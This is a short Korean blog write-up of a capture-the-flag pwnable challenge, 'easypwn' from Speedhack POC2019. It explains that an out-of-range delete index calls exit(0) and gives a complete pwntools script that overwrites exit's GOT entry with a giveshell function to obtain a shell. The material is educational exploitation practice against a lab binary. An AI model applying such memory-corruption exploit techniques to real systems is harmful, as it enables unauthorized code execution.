Speedhack Poc2019 Pwnable Writeup

LeeDoHyun · June 1, 2020

처음에 system 함수 던져줘서 받고 시작했는데 결국에는 필요 없었습니다…

그냥 delete 함수에 idx가 9를 넘어버리면 exit(0);이 호출되는데 [email protected]를 덮어버리면 됩니다.

#!/usr/bin/env python2
#-*-coding:utf8-*-

from pwn import *

#context.log_level = 'debug'
r = process('./easypwn')
e = ELF('./easypwn')

'''
r.recvuntil('0x')
system = int(r.recv(12), 16)

log.success('system addr : {}'.format(hex(system)))
'''

giveshell = e.symbols['giveshell']

def malloc(size, idx, data):
    r.sendlineafter('>', str(1))
    r.sendlineafter(':', str(size))
    r.sendlineafter(':', str(idx))
    r.sendlineafter(':', str(data))

def free(idx):
    r.sendlineafter('>', str(2))
    r.sendlineafter(':', str(idx))

malloc(-1, 0x601050, giveshell)
free(10)
r.interactive()

Twitter, Facebook